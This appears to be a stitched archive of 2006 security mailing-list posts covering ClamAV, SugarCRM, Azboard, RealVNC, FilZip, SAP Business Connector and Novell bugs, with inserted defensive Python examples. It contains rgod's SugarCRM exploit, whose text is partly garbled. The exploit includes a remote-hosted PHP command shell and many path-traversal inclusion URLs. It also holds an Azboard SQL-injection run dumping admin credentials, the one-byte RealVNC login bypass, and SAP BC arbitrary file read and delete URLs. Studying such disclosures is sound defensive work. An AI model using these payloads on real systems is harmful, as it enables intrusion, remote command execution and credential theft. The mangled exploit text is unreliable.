    ERROR: Parse error at line 1: Unknown option root:$1$Shootthis$shouldntbehere/:12881:0:9:7:::.
    ERROR: Can't parse the config file /etc/shadow

You can see here that the setgid(user->pw_gid) and setuid(user->pw_uid) calls occur a bit too late to be of use to the getcfg() function.

I don't quite get why privs would be dropped when using --on-update-execute but not when --config-file is used. For that matter I don't get why one would drop privs at all if there was never intended to be any setuid like activity involved. If the setgid and setuid calls are to be used at all they should be placed before getcfg() is called.

As a side note to the bug itself, after visiting the clamav binaries webpage at http://www.clamav.net/binary.html and viewing the following text, Macintosh users may have found themselves installing clamXav:

    MacOS X
    * clamXav, a GUI for ClamAV running on MacOS X, is available at http://www.markallan.co.uk/clamXav (http://www.clamxav.com/). It includes a slightly modified version of ClamAV engine as a back end.
    ClamAV also ships with MacOS X 10.4 (Tiger)
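Two separate defects combine in the advisory: the privilege drop happens after the caller-chosen config path has already been opened and parsed as root, and the parser copies each line it cannot understand into its error message. The following is an added example, not ClamAV's code, that does the two things in the order the post asks for: drop privileges (supplementary groups, gid, uid, each verified) before opening anything, and report parse errors by line number only. The config grammar ("Option value" lines, '#' comments) and the option names are assumed for the example; the demo loads a constructed file as the current user so it runs unprivileged.

```python
"""Drop privileges before touching caller-supplied paths, and keep file
contents out of parser error messages.

Added example; not ClamAV's code.  In the advisory, setgid()/setuid() run only
after getcfg() has parsed the --config-file path as root, and the parser copies
each unparseable line into its error message, so any root-readable file can be
displayed line by line.  Here the operations are ordered correctly and errors
name a line number only.  The config grammar ("Option value" lines, '#'
comments) and the option names are assumed for the example.
"""
import os
import tempfile

KNOWN_OPTIONS = {"DatabaseDirectory", "DatabaseMirror", "LogFile"}  # assumed names


class ConfigError(Exception):
    """Parse failure; the message carries a line number, never line content."""


def parse_config_text(text: str) -> dict:
    """Parse 'Option value' lines.  An unknown option is reported by line
    number only, so a parser pointed at the wrong file cannot be used to
    read that file one error message at a time."""
    options = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        name, _, value = stripped.partition(" ")
        if name not in KNOWN_OPTIONS:
            raise ConfigError("Parse error at line %d: unknown option" % lineno)
        options[name] = value.strip()
    return options


def drop_privileges(uid: int, gid: int) -> None:
    """Become uid/gid irreversibly: supplementary groups, then gid, then uid,
    each step verified.  A no-op when the process already is that user."""
    if os.getuid() == uid and os.geteuid() == uid and os.getgid() == gid:
        return
    if os.geteuid() != 0:
        raise PermissionError("cannot switch to uid %d: not running as root" % uid)
    os.setgroups([gid])
    os.setgid(gid)
    os.setuid(uid)
    if os.getuid() != uid or os.geteuid() != uid or os.getgid() != gid:
        raise PermissionError("privilege drop did not take effect")


def load_config_as_user(path: str, uid: int, gid: int) -> dict:
    """Correct order: drop privileges first, then open and parse.  If the
    unprivileged user may not read `path`, open() fails with EACCES instead
    of root's credentials being lent to whoever chose the path."""
    drop_privileges(uid, gid)
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return parse_config_text(fh.read())


def demo_as_current_user() -> dict:
    """Write a constructed config to a temp file and load it as the current
    user (the privilege drop is then a no-op), so the flow runs unprivileged."""
    sample = ("# constructed sample configuration\n"
              "DatabaseMirror database.clamav.net\n"
              "LogFile /var/log/freshclam.log\n")
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as fh:
        fh.write(sample)
        path = fh.name
    try:
        return load_config_as_user(path, os.getuid(), os.getgid())
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo_as_current_user())
    try:
        parse_config_text("root:$1$constructed$hash:12881:0:9:7:::\n")
    except ConfigError as exc:
        print(exc)   # line number only; the shadow-style line is not echoed
```

Ordering alone would already have turned the /etc/shadow case into a plain "Permission denied"; the error-message change is the second layer, for the case where the parser is reachable while still privileged for some other reason.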
Sugar Suite Open Source <= 4.2 OptimisticLock! arbitrary remote inclusion exploit
#!/usr/bin/php -q -d short_open_tag=on ? echo Sugar Suite Open Source = 4.2 \OptimisticLock!\ arbitrary remote inclusion exploit\r\n; echo by rgod [EMAIL PROTECTED]; echo site: http://retrogod.altervista.org\r\n\r\n;; echo this is called the \five claws of Sun-tzu\\r\n\r\n; if ($argc5) { echo Usage: php .$argv[0]. host path location cmd OPTIONS\r\n; echo host: target server (ip/hostname)\r\n; echo path: path to sugar suite\r\n; echo location: an arbitrary location with the code to include\r\n; echo cmd: a shell command\r\n; echo Options:\r\n; echo-p[port]:specify a port other than 80\r\n; echo-P[ip:port]: specify a proxy\r\n; echo Examples:\r\n; echo php .$argv[0]. localhost /sugar/ http://somehost.com/shell.txt ls -la\r\n; echo php .$argv[0]. localhost /sugar/ http://somehost.com/shell.txt ls -la -p81\r\n; echo php .$argv[0]. localhost / http://somehost.com/shell.txt ls -la -P1.1.1.1:80\r\n\r\n; echo note, you need this code in http://somehost.com/shell.txt\r\n;; echo ?php\r\n; echo if (get_magic_quotes_gpc()){\$_REQUEST[\cmd\]=stripslashes(\$_REQUEST[\cmd\]);}\r\n; echo ini_set(\max_execution_time\,0);\r\n; echo echo \*delim*\;\r\n; echo passthru(\$_REQUEST[\cmd\]);\r\n; echo echo \*delim*\;\r\n; echo ?\r\n; die; } /* software site: http://www.sugarcrm.com/crm/ i) vulnerable code in modules/OptimisticLock/LockResolve.php: ... if(empty($GLOBALS['sugarEntry'])) die('Not A Valid Entry Point'); //--- the [EMAIL PROTECTED] protection, nearly in all files ... 
if(isset($_SESSION['o_lock_object'])){ global $beanFiles, $moduleList; $object = $_SESSION['o_lock_object']; require_once($beanFiles[$beanList[$_SESSION['o_lock_module']]]); $current_state = new $_SESSION['o_lock_class'](); $current_state-retrieve($object['id']); if(isset($_REQUEST['save'])){ $_SESSION['o_lock_fs'] = true; echo $_SESSION['o_lock_save']; die(); }else{ display_conflict_between_objects($object, $current_state-toArray(),$current_state-field_defs, $current_state-module_dir, $_SESSION['o_lock_class']); }}else{ echo 'No Locked Objects'; } ... you can include files from local remote resources and launch commands, poc: with register_globals = On allow_url_fopen = On: http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1_SESSION[o_lock_object]=1_SESSION[o_lock_module]=1beanList[1]=1beanFiles[1]=http://somehost.com/someshell.txt with register_globals = On: http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1_SESSION[o_lock_object]=1_SESSION[o_lock_module]=1beanList[1]=1beanFiles[1]=../../../../../../../../etc/passwd ii) arbitrary local inclusion issues in a lot of files: with register_globals = On magic_quotes_gpc = Off: http://[target]/[path]/modules/Administration/CustomizeFields.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Administration/Development.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Administration/DstFix.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Administration/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/include/SubPanel/SubPanelViewer.php?GLOBALS[sugarEntry]=1module=1record=1beanList[1]=1theme=../../../../../../../../../../../../etc/passwd%00 
http://[target]/[path]/modules/Accounts/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Administration/Upgrade.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Bugs/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Calendar/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Calls/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/CampaignLog/Forms.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Campaigns/Forms.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Campaigns/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/CampaignTrackers/Forms.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/modules/Cases/index.php?GLOBALS[sugarEntry]=1theme=../../../../../../../../../../../../etc/passwd%00
Azboard <= 1.0 Multiple Sql Injections

Title     : Azboard <= 1.0 Multiple Sql Injections
Published : 2006.5.14
Author    : x90c(정경주)@chollian.net/~jyj9782/
Link      : http://user.chol.com/~jyj9782/sec/azboard_advisory.txt

0x01 Summary

Azboard is a web board written in ASP (Active Server Pages). It has an SQL injection hole, so we can get the admin (bbs) ID and password and so on. Let's start by looking at the code.

0x02 Codes

~/azboard/list.asp:
-
49: if searchstring then
50:     sql = "select count(board_idx) from board where " & search & " like '%" & searchstring & "%' and cate='" & cate & "'"
51: else
52:     sql = "select count(board_idx) from board where cate='" & cate & "'"
53: end if
-
The above lines are vulnerable to SQL attack, as you can see. y0! ;)~

~/azboard/admin_ok.asp:
-
27: SQL = "SELECT cate,admin_id,admin_pass,board_name FROM board_admin where admin_id='" & id & "' and cate='" & cate & "'"
-
I found the fields ('admin_id', 'admin_pass') and the table ('board_admin') in this file.

0x03 Exploit

[EMAIL PROTECTED] exploits]# ls -al azboard_blue.c
-rw-r--r--  1 root root  4771 5월 14 23:30 azboard_blue.c
[EMAIL PROTECTED] exploits]# ls -al azboard_blue
-rwxr-xr-x  1 root root 17163 5월 14 23:30 azboard_blue
[EMAIL PROTECTED] exploits]#
[EMAIL PROTECTED] exploits]# make azboard_blue
cc     azboard_blue.c   -o azboard_blue
azboard_blue.c: In function `tu1':
azboard_blue.c:55: warning: assignment makes pointer from integer without a cast
azboard_blue.c:59: warning: assignment makes pointer from integer without a cast
azboard_blue.c:63: warning: assignment makes pointer from integer without a cast
azboard_blue.c:67: warning: assignment makes pointer from integer without a cast
[EMAIL PROTECTED] exploits]# ./azboard_blue
azboard 1.0 <= 0day : $ ./azboard_blue azboard URL cate ~ [EMAIL PROTECTED]/~jyj9782
[EMAIL PROTECTED] exploits]#
[EMAIL PROTECTED] exploits]# ./azboard_blue http://192.168.0.5 testbbs
[ LANG=KOR admin id   ] admin
[ LANG=KOR admin pass ] 1234
[EMAIL PROTECTED] exploits]#

0x04 Patch

~/azboard/list.asp:
..
if instr(search, "'") > 0 or instr(cate, "'") > 0 or instr(cate, "'") > 0 then
    Response.redirect "error.asp"
end if
..

Thanks for many 0p3n-H4ck3rz! - Blu3h4t Team.
RealVNC 4.1.1 Remote Compromise
Rumors of this bug began spreading on Slashdot and other sites, thanks to Steve Wiseman of intelliadmin.com who serendipitously discovered it while writing a VNC client. At first it was only a rumor, as Steve's site gave scant details and he himself was surprised such a huge hole could possibly exist in such a widely deployed product. Here are the results of my research into this rumor.

In the interests of full disclosure, the following message details a critical vulnerability in RealVNC's authentication protocol. Using the following method, it is trivial to gain access to any RealVNC server without knowing the password. This allows full control of the target machine, with privilege levels equalling that of the user under which the RealVNC server runs - often full Administrator access on Windows desktops.

RealVNC is a widely used program which makes it possible to view and fully interact with one computer from any other computer or mobile device anywhere on the Internet. (www.realvnc.com)

As documented in rfbproto.pdf by Tristan Richardson, the RFB (remote framebuffer) protocol performs an initial handshake which allows clients and servers to negotiate appropriate authentication measures. There are several methods of authentication, including the standard DES challenge-response, as well as an option to disable authentication completely. Due to an incorrect implementation, clients are able to force the server to disable authentication, and allow login without a password.

Technical details:

1)  Server sends its version, "RFB 003.008\n"
2)  Client replies with its version, "RFB 003.008\n"
3)  Server sends 1 byte which is equal to the number of security types offered
3a) Server sends an array of bytes which indicate the security types offered
4)  Client replies with 1 byte, chosen from the array in 3a, to select the security type
5)  The handshake, if requested, is performed, followed by SecurityResult from the server

In RealVNC 4.1.1 and possibly prior versions which implement RFB 003.008 (though not RealVNC 4.0), the server does NOT perform a check to determine if the byte sent by the client in step 4 has actually been offered by the server in step 3a. In effect, authentication is moved from the server side to the client side. It is possible to force your client to simply request Type 1 - None as the security type, and gain access to the server without having to go through the time-consuming and cumbersome password entry field.

Here is a typical packet dump:

Server -> Client: 52 46 42 20 30 30 33 2e 30 30 38 0a   - Server version
Client -> Server: 52 46 42 20 30 30 33 2e 30 30 38 0a   - Client version
Server -> Client: 01 02                                  - One field follows... and that field is 02 (DES Challenge)
Client -> Server: 01                                     - Ahh, the lovely 1 byte exploit! Beautiful, isn't it?
Server -> Client: 00 00 00 00                            - Authenticated!

Modifying the RealVNC client to exploit this is simple, and other clients can be modified as well. Such exercises, however, are best left to the skilled reader. To all admins, you are reminded to run services like these behind firewalls and through SSH tunnels.

And now a very important message... RealVNC is distributed under the GNU General Public License. As such, the complete source code of RealVNC *must* be freely distributed. When RealVNC (the company) received notice of this flaw in their software, they were quite prompt in patching it. Such action is normally worthy of praise. Yet, in this case, RealVNC immediately took down the source code to their software.

While this was probably done out of fear rather than malice, I believe it violates both the spirit and law of the GNU GPL. As we can see from the above, it is also not beneficial to security. I was able to rediscover this flaw using only binaries, and a little thought. Allowing for the benefit of the doubt, I posted to the RealVNC mailing list, congratulating them on patching the bug so quickly and asking when the source code would be released. I received one reply from another user, agreeing that he would like to see the source, as it is under GPL. Upon returning the next day to check if there were any more replies, I was surprised to see the entire mailing list was deleted along with its archives. This is unfortunate, and it clearly neither prevents discussion nor promotes security.

Best,
James Evans
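The negotiation in steps 3 to 5 of the post above, modelled in Python as an added example (this is not James Evans's code and not RealVNC's; the message layouts follow RFB 3.8, the byte values are the ones in the packet dump, and the `check_offered` switch is an assumption that stands in for the validation the post says 4.1.1 lacks). With the check off, a client that answers 01 to an offer of 02 gets SecurityResult 0 and is in; with it on, the server answers with a failure and a reason string, as 3.8 specifies:

```python
import struct

RFB_VERSION = b"RFB 003.008\n"
SEC_INVALID, SEC_NONE, SEC_VNCAUTH = 0, 1, 2   # RFB 3.8 security type numbers


def server_offer(types):
    """Step 3/3a: one count byte followed by the offered security types."""
    return bytes([len(types)]) + bytes(types)


def security_result(ok, reason=b""):
    """Step 5: u32 SecurityResult, 0 = OK. In RFB 3.8 a failure (1) is
    followed by a u32 length and a reason string."""
    if ok:
        return struct.pack(">I", 0)
    return struct.pack(">I", 1) + struct.pack(">I", len(reason)) + reason


def handle_client_choice(offered, choice, check_offered):
    """Server side of step 4. With check_offered=False the server trusts the
    client's byte, which is the behaviour the post attributes to 4.1.1.
    Returns (selected_type, bytes_to_send_or_None)."""
    chosen = choice[0]
    if check_offered and chosen not in offered:
        return SEC_INVALID, security_result(False, b"security type not offered")
    if chosen == SEC_NONE:
        return SEC_NONE, security_result(True)       # no challenge at all
    if chosen == SEC_VNCAUTH:
        return SEC_VNCAUTH, None                     # 16-byte DES challenge would follow
    return SEC_INVALID, security_result(False, b"unknown security type")


def run_exchange(offered, client_pick, server_checks):
    """Replay the messages of the packet dump in memory. Returns
    (selected_type, transcript) with transcript a list of (direction, bytes)."""
    transcript = [("S->C", RFB_VERSION), ("C->S", RFB_VERSION),
                  ("S->C", server_offer(offered))]
    choice = bytes([client_pick])
    transcript.append(("C->S", choice))
    selected, reply = handle_client_choice(offered, choice, server_checks)
    if reply is not None:
        transcript.append(("S->C", reply))
    return selected, transcript


if __name__ == "__main__":
    # Server offers only VNC authentication (02); client answers None (01).
    for checks in (False, True):
        sel, msgs = run_exchange([SEC_VNCAUTH], SEC_NONE, checks)
        print("server validates choice:", checks, "-> selected type", sel)
        for direction, data in msgs:
            print("  %s: %s" % (direction, " ".join("%02x" % b for b in data)))
```

The fix is the one line `chosen not in offered`: the server, not the client, owns the list of acceptable types, and a choice outside it must fail the handshake before any SecurityResult 0 is sent.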
tyree[at]users.sourceforge.net
FYI A security beta has been released on SourceForge (http://sourceforge.net/projects/phpmyagenda) that addresses this issue. Regards, Tyree
Secunia Research: FilZip unacev2.dll Buffer Overflow Vulnerability
======================================================================
                     Secunia Research 15/05/2006

       - FilZip unacev2.dll Buffer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software ............................................. 1
Severity ...................................................... 2
Description of Vulnerability .................................. 3
Solution ...................................................... 4
Time Table .................................................... 5
Credits ....................................................... 6
References .................................................... 7
About Secunia ................................................. 8
Verification .................................................. 9

======================================================================
1) Affected Software

* FilZip version 3.04.

Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately Critical
Impact: System Access
Where:  Remote

======================================================================
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in FilZip, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive.

The vulnerability is related to: SA16479

======================================================================
4) Solution

Do not extract ACE archives from untrusted sources.

======================================================================
5) Time Table

26/04/2006 - Initial vendor notification.
27/04/2006 - Second vendor notification.
11/05/2006 - Third vendor notification.
15/05/2006 - Public disclosure. (No reply from vendor)

======================================================================
6) Credits

Discovered by Secunia Research.

======================================================================
7) References

SA16479: http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2005-2856 for the vulnerability.

======================================================================
8) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-30/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
CYBSEC - Security Advisory: Phishing Vector in SAP BC (Business Connector)
(The following advisory is also available in PDF format for download at:
http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_Phishing_Vector_in_SAP_BC.pdf )

CYBSEC S.A.
www.cybsec.com

Advisory Name: Phishing Vector in SAP BC (Business Connector)
Vulnerability Class: Phishing Vector / Improper Input Validation
Release Date: 05/15/2006
Affected Applications:
* SAP BC Core Fix 7 (and below)
Affected Platforms:
* Platform-Independent
Local / Remote: Remote
Severity: Low
Author: Leandro Meiners.
Vendor Status:
* Confirmed, patch released.
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf

Product Overview:
=================
SAP Business Connector (SAP BC) is a middleware application based on the B2B integration server from webMethods. It enables communication between SAP applications and SAP R/3 and non-SAP applications, by making all SAP functions accessible to business partners over the Internet as an XML-based service. The SAP Business Connector uses the Internet as a communication platform and XML or HTML as the data format. It integrates non-SAP products by using an open, non-proprietary technology.

Vulnerability Description:
==========================
SAP BC was found to provide a vector to allow Phishing scams against the SAP BC administrator.

Technical Details:
==================
The parameter "url" of the page adapter-index.dsp allows absolute URLs, such as http://www.google.com. This can be used to mount a Phishing scam by sending a link like

http://sapbc/WmRoot/adapter-index.dsp?url=http://www.attacker.com

that if clicked by the administrator (while logged in, or if he logs in after clicking) will load the attacker's site webpage inside an HTML frame.

Impact:
=======
This can be used to mount a Phishing scam by sending a link that, if clicked by the administrator (while logged in, or if he logs in after clicking), will load the attacker's site webpage inside an HTML frame.

Solutions:
==========
SAP released a patch regarding this issue, which requires Server Core Fix 7. Details can be found in SAP note 908349.

Vendor Response:
================
* 12/06/2005: Initial Vendor Contact.
* 12/07/2005: Technical details for the vulnerabilities sent to vendor.
* 12/19/2005: Solutions provided by vendor for all vulnerabilities.
* 02/15/2006: Coordinate release of pre-advisory without technical details.
* 05/15/2006: Coordinate release of advisory with technical details.

Contact Information:
====================
For more information regarding the vulnerability feel free to contact the author at lmeinersatcybsec.com.
For more information regarding CYBSEC: www.cybsec.com

Leandro Meiners
CYBSEC S.A. Security Systems
E-mail: [EMAIL PROTECTED]
Tel/Fax: [54-11] 4382-1600
Web: http://www.cybsec.com
PGP-Key: http://pgp.mit.edu:11371/pks/lookup?search=lmeiners&op=index
CYBSEC - Security Advisory: Arbitrary File Read/Delete in SAP BC (Business Connector)
(The following advisory is also available in PDF format for download at:
http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_Arbitrary_File_Read_or_Delete_in_SAP_BC.pdf )

CYBSEC S.A.
www.cybsec.com

Advisory Name: Arbitrary File Read/Delete in SAP BC (Business Connector)
Vulnerability Class: Improper Input Validation
Release Date: 05/15/2006
Affected Applications:
* SAP BC 4.6
* SAP BC 4.7
Affected Platforms:
* Platform-Independent
Local / Remote: Remote
Severity: Medium
Author: Leandro Meiners.
Vendor Status:
* Confirmed, patch released.
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf

Product Overview:
=================
SAP Business Connector (SAP BC) is a middleware application based on the B2B integration server from webMethods. It enables communication between SAP applications and SAP R/3 and non-SAP applications, by making all SAP functions accessible to business partners over the Internet as an XML-based service. The SAP Business Connector uses the Internet as a communication platform and XML or HTML as the data format. It integrates non-SAP products by using an open, non-proprietary technology.

Vulnerability Description:
==========================
SAP BC was found to allow reading and deleting any file on the file system to which the user that the SAP BC is running as has access. The vulnerability is present in the Monitoring functionality of the SAP Adapter.

Technical Details:
==================
When you view a log file (such as new_sap.log) the URL used is:

http://sapbc/SAP/chopSAPLog.dsp?fullName=packages%2FSAP%2Flogs%2Fnew_sap.log

If the fullName parameter is changed to /etc/passwd (URL encoded), then instead of SAP PATH/packages/SAP/logs/new_sap.log being viewed, the contents of the file /etc/passwd are presented to the user. As mentioned before, any file on the file system to which the user that the SAP BC is running as has read access can be viewed.

The following URL (designed to allow deletion of log files) allows deleting any file on the file system that the user the SAP BC is running as can delete.

http://sapbc/invoke/sap.monitor.rfcTrace/deleteSingle?fullName=path_to_file

Impact:
=======
The Business Connector by default runs as a privileged user (administrator on the Windows platform and root on *NIX platforms), which allows ANY file on the file system to be read/deleted.

According to the SAP Business Connector Security Best Practices, the following strategies are recommended for running the SAP BC in *NIX environments:

1. Running as non-root user, using a high port.
2. Running as non-root user, using a high port and port remapping to see the SAP BC on a restricted port.
3. Running the JVM setuid root.
4. Running SAP BC as root.

If either strategy (1) or (2) was taken, the scope of the vulnerability was mitigated to allowing read/delete access to only the files owned by the user which the BC was running as. However, if (3) or (4) had been chosen, ANY file on the file system could be read/deleted from the BC. Moreover, (3) allowed any user of the Operating System to obtain root, since any Java program would be run with root privileges due to a setuid Java Virtual Machine.

The SAP Business Connector Security Best Practices has been corrected to recommend running the BC as a non-root user and using a high-numbered port or, if supported by the Operating System, giving the user privileges to open a specific port below 1024 to be used by the BC.

Solutions:
==========
SAP released a patch regarding this issue, for versions 4.6 and 4.7 of SAP BC. Details can be found in SAP note 906401.

Vendor Response:
================
* 12/06/2005: Initial Vendor Contact.
* 12/07/2005: Technical details for the vulnerabilities sent to vendor.
* 01/20/2006: Solution provided by vendor.
* 02/15/2006: Coordinate release of pre-advisory without technical details.
* 05/15/2006: Coordinate release of advisory with technical details.

Contact Information:
====================
For more information regarding the vulnerability feel free to contact the author at lmeinersatcybsec.com.
For more information regarding CYBSEC: www.cybsec.com

Leandro Meiners
CYBSEC S.A. Security Systems
E-mail: [EMAIL PROTECTED]
Tel/Fax: [54-11] 4382-1600
Web: http://www.cybsec.com
PGP-Key: http://pgp.mit.edu:11371/pks/lookup?search=lmeiners&op=index
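The SAP BC fullName parameter above and the SugarCRM theme/beanFiles includes earlier on this page fail in the same way: a request value is joined to a base directory and opened without checking where the result actually lands. The function below is an added example in Python (not code from SAP, SugarCRM or either advisory) of the containment check a practitioner would want in such a handler; the directory names and the ".log"/".php" suffix rules are assumptions. It rejects the %00 truncation trick, scheme://host values (remote includes) and any path that resolves outside the base after ".." and symlinks are applied, and it uses commonpath rather than a string prefix so that "logs_evil/" next to "logs/" is not mistaken for inside:

```python
import os
from urllib.parse import unquote


def resolve_under(base_dir, user_value, allowed_suffixes=()):
    """Return the absolute path that user_value names inside base_dir, or None
    if the value must be rejected. user_value is the already URL-decoded
    request parameter (theme=, fullName=, ...)."""
    if not user_value or "\x00" in user_value:
        return None                     # %00: C-string truncation of the real suffix
    if "://" in user_value:
        return None                     # http://host/shell.txt style remote include
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value))
    # os.path.join discards base when user_value is absolute, and realpath
    # collapses ../ and symlinks, so the containment test below sees the
    # file that would really be opened.
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:                  # e.g. different drives on Windows
        inside = False
    if not inside:
        return None
    if allowed_suffixes and not candidate.endswith(tuple(allowed_suffixes)):
        return None
    return candidate


def log_file_from_query(logs_dir, raw_full_name):
    """SAP BC style: fullName= must name a .log under the logs directory."""
    return resolve_under(logs_dir, unquote(raw_full_name), (".log",))


def theme_file_from_query(themes_dir, raw_theme):
    """SugarCRM style: theme= must name a .php under the themes directory."""
    return resolve_under(themes_dir, unquote(raw_theme), (".php",))


if __name__ == "__main__":
    # Constructed inputs taken from the shapes of the URLs on this page.
    samples = [
        "packages%2FSAP%2Flogs%2Fnew_sap.log",
        "%2Fetc%2Fpasswd",
        "../../../../../../../../../../etc/passwd%00",
        "http://somehost.com/someshell.txt",
    ]
    for s in samples:
        print("%-48s -> %s" % (s, log_file_from_query("/opt/sapbc", s)))
```

Note that the suffix rule alone would not have saved the SugarCRM case: "../../etc/passwd%00" ends in ".php" after the server appends its suffix only because the NUL cuts the name short, which is why the NUL check comes first and the suffix check is applied to the resolved path.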
Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
To share information about the new Release Notes document: this issue has been fixed in version 4.1.2 (Free Edition) http://www.realvnc.com/products/free/4.1/release-notes.html http://www.realvnc.com/download.html - Juha-Matti
Re: How secure is software X?
Fabian Becker [EMAIL PROTECTED] wrote on 05/12/2006 03:12:32 PM:

> Dear David
>
> in my opinion a software can either be secure or not secure. I think it's a bit like a woman cannot be a bit pregnant. But the protocol you are talking about can be used to tell the secure from the insecure pieces of software. By applying a test for these rules against systems, security will definitely be enhanced since software brandmarked with "insecure" will simply lose its value.
>
> Another question is how to verify that authors check their own software? If they do not do it by now, why then? The only reason I could imagine would be a raise in value by being able to say "My software is a tested 'secure' one."

Hello Fabian,

Respectfully, to classify security like that would be to condemn every software as insecure. What I see David proposing is more akin to how far along in her pregnancy. It is a measurement. Hopefully we can all agree that with large applications (e.g. Oracle, WebSphere, Windows, etc...) there are bugs. While the desired direction may be 100% security (much like the desired personal goal is perfection), we need to be able to qualify how difficult it is to break applications in a standardized fashion.

The one caveat I might bring up is the topic of false security. It is difficult to prove, in a standardized methodology, that an application is difficult to break; only that our methodology has failed to do so. How in-depth a fuzzing do we apply for this standard? Does the standard include significant levels of reverse engineering? If so, who does this (since some are more proficient than others)? If not, what true value does this standard prove, except that the application can withstand yet another script?

In concept, I agree wholeheartedly that a security qualification could be beneficial. And perhaps, with all the brainpower involved, a relatively reliable automated method could be achieved. There are many details which would need to be sorted out.

Some applications are more easily fuzzed than others... For example, SMTP servers have a pretty standard interface, they have to. Database servers do not, although they do have underlying language similarities. Web app servers, such as WebSphere and Oracle app server, may have commonalities, but have such a breadth of testing required to give any comprehensive qualification, to do so seems rather overwhelming. In my own little portable mind, such a standard would require an infrastructure of standards, with each class of application being represented and handled separately.

One alternative proposition would be to provide a difficulty rating for the security researchers to apply to their vulnerability reports/analysis. Simply an appendage to our normal bugtraq traffic. Let the researchers grade the difficulty. Perhaps this would be problematic as well, since it would take me far longer to find a vuln in Oracle than it would for someone like David. But it would be a start.

$0x02
Novell NDPS Remote Vulnerability (Server Client)
Summary:
There's an integer overflow present that affects Novell Windows clients and Novell Netware server and Novell Open Enterprise server.

Impact:
Remote, unauthenticated, super-user privileges.

Affected software:
Novell Netware (All versions)
Novell Open Enterprise Server (All NetWare based versions)
Novell Netware Client for Windows (All versions)

Credit:
Ryan Smith
Alex Wheeler

Details / Patch information:
http://www.hustlelabs.com/novell_ndps_advisory.pdf

Vendor links:
http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=9145&sliceId=SAL_Public&dialogID=3455056&stateId=0%200%203453353
http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=1076&sliceId=SAL_Public&dialogID=3455056&stateId=0%200%203453353

License:
This work is licensed under the Creative Commons Attribution 2.5 License. To view a copy of this license, visit http://creativecommons.org/licenses/by/2.5/ or send a letter to Creative Commons, 543 Howard Street, 5th Floor, San Francisco, California, 94105, USA. Attribution should be provided both in the form of a link or reference to http://www.hustlelabs.com and a copy of the researchers' names listed under the Credit section of this document. All other trademarks and copyrights referenced in this document are the property of their respective owners.
Secunia Research: Abakt ZIP File Handling Buffer Overflow Vulnerability
======================================================================
                     Secunia Research 15/05/2006

     - Abakt ZIP File Handling Buffer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software ............................................. 1
Severity ...................................................... 2
Description of Vulnerability .................................. 3
Solution ...................................................... 4
Time Table .................................................... 5
Credits ....................................................... 6
References .................................................... 7
About Secunia ................................................. 8
Verification .................................................. 9

======================================================================
1) Affected Software

* Abakt version 0.9.2 and 0.9.3-beta1

Prior versions may also be affected.

======================================================================
2) Severity

Rating: Moderately Critical
Impact: System Access
Where:  Remote

======================================================================
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Abakt, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error when listing the contents of a ZIP archive. This can be exploited to cause a stack-based buffer overflow when a malicious ZIP archive containing a file with an overly long filename is opened.

The vulnerability is related to: SA19945

Successful exploitation allows execution of arbitrary code but requires that the user is e.g. tricked into opening a malicious ZIP archive from within the "Restore Zip Archive" functionality.

======================================================================
4) Solution

The vulnerability has been fixed in 0.9.3-RC1.

